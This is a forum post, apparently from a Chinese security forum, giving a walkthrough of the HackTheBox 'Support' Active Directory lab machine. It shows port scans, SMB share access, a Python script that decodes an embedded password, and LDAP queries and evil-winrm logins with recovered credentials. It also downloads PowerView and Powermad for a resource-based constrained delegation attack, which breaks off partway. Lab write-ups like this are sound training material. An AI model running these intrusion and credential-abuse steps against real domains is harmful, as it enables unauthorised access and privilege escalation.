首页
社区
课程
招聘
[原创]HTB SUPPORT wp(easy)
发表于: 2022-11-29 22:59 1027

[原创]HTB SUPPORT wp(easy)

2022-11-29 22:59
1027

靶机涉及AD域,本人暂时也是一知半解,参考原文:
https://shakuganz.com/2022/09/13/hackthebox-support-write-up/
关于AD域的文章:
https://daiker.gitbook.io/windows-protocol/ldap-pian/11#0x01-windows-fang-wen-kong-zhi-mo-xing
https://www.freebuf.com/articles/system/350266.html
https://www.freebuf.com/articles/web/304850.html
先用 rustscan跑一下目标开启了那些端口

图片描述
之后使用nmap

图片描述

图片描述
当显示了带有版本号的可用软件时,可以谷歌相应的软件版本(7-Zip)是否有权限提升漏洞。此外还有UserInfo.exe.zip,因为没有官方软件叫做UserInfo,此二进制文件可能包含用户凭据。
图片描述
发现是.net的文件使用dnspy进行逆向
发现其中有简单加密后存储的密码
图片描述

获得密码

使用新找到的凭据,我们可以进行 LDAP 查询。在搜索用户列表时,我注意到一个有趣的用户,也称为支持。

使用新找到的凭据进行LDAP查询。在搜索用户列表时,到一个跟题目名称一样的用户support
图片描述
查看support的信息,发现“info”字段

图片描述
https://www.freebuf.com/articles/network/355261.html
WMI 订阅利用

图片描述
在 本机上 下载两个脚本

使用evil-winrm上传

图片描述
查看是否允许用户在域上创建新的计算机对象。默认情况下,域成员最多可以将10 台计算机添加到域中。并检查机器是否至少为Windows Server 2012。
图片描述
图片描述
检查目标计算机有没有设置 msds-allowedtoactonbehalfofotheridentity 属性。
图片描述
创建一个新的计算机对象
图片描述
为“fake01”计算机主体创建一个新的原始安全描述符。

图片描述

图片描述
图片描述
图片描述

图片描述

图片描述

rustscan  10.10.11.174
rustscan  10.10.11.174
nmap 10.10.11.174 -sC -sV -p 53,88,135,139,389,445,464,593,636 -Pn
nmap 10.10.11.174 -sC -sV -p 53,88,135,139,389,445,464,593,636 -Pn
smbmap -H 10.10.11.174 -u anonymous
smbmap -H 10.10.11.174 -u anonymous
smbclient \\\\$IP\\support-tools
get UserInfo.exe.zip
smbclient \\\\$IP\\support-tools
get UserInfo.exe.zip
import base64
 
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando".encode("UTF-8")
 
array = base64.b64decode(enc_password)
array2 = ""
 
for i in range(len(array)):
    array2 += chr(array[i] ^ key[i % len(key)] ^ 223)
 
print(array2)
import base64
 
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando".encode("UTF-8")
 
array = base64.b64decode(enc_password)
array2 = ""
 
for i in range(len(array)):
    array2 += chr(array[i] ^ key[i % len(key)] ^ 223)
 
print(array2)
nvEfEK16^1aM4$e7AclUf8x$tRWxPW​​O1%lmz
nvEfEK16^1aM4$e7AclUf8x$tRWxPW​​O1%lmz
ldapsearch -v -x -b "DC=support,DC=htb" -H "ldap://10.10.11.174" "(objectclass=*)" "sAMAccountName" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | grep sAMAccountName
ldapsearch -v -x -b "DC=support,DC=htb" -H "ldap://10.10.11.174" "(objectclass=*)" "sAMAccountName" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | grep sAMAccountName
ldapsearch -v -x -b "CN=support,CN=Users,DC=support,DC=htb" -H "ldap://10.10.11.174" "(objectclass=*)" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
ldapsearch -v -x -b "CN=support,CN=Users,DC=support,DC=htb" -H "ldap://10.10.11.174" "(objectclass=*)" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
sudo gem install evil-winrm
evil-winrm -i $IP -u "support" -p 'Ironside47pleasure40Watchful'
sudo gem install evil-winrm
evil-winrm -i $IP -u "support" -p 'Ironside47pleasure40Watchful'
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1
upload PowerView.ps1

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2023-1-20 16:50 被hml189编辑 ,原因:
收藏
免费 1
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//